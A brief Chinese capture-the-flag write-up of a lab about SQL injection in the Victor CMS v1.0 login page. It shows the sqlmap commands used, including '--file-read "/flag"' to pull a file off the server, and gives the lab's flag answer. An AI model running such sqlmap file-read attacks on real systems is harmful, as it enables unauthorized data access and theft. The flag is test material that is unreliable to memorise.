目录

一、题目

二、bp抓包跑sqlmap

---

一、题目

介绍：

Victor CMS v1.0 /includes/login.php 存在sql注入

进入靶场：

 官方给出的应该是登录界面

admin登录看看 是空白页面 不过看包头应该是POST方式：

二、bp抓包跑sqlmap

  burp抓包：

存文件 给sqlmap梭哈：

python sqlmap.py -l icq.txt --batch -dbs

这样好像对这个靶场漏洞不起作用：

一直卡住。。。

csdn求大佬吧：

python sqlmap.py -r xxx.txt --file-read "/flag" --dbms mysql --batch

       file-read: SQLmap --file-read从服务器中读取文件
       当用户权限足够大并且具有特定的函数，即可读取服务器中的文件，可以是文本，也可以是二进制文件
        dbms mysql 指定数据库类型

由于win的sqlmap跑不出来，我也不知道为啥。。。 

kali的sqlmap跑一下：

 跑出来生成到kali的sqlmap目录下：

 cat 查看一下：

 cat /root/.local/share/sqlmap/output/xxx.ichunqiu.com/files/_flag

 得出来flag{b0015c11-4c39-42ce-8749-fdc15330fd4d}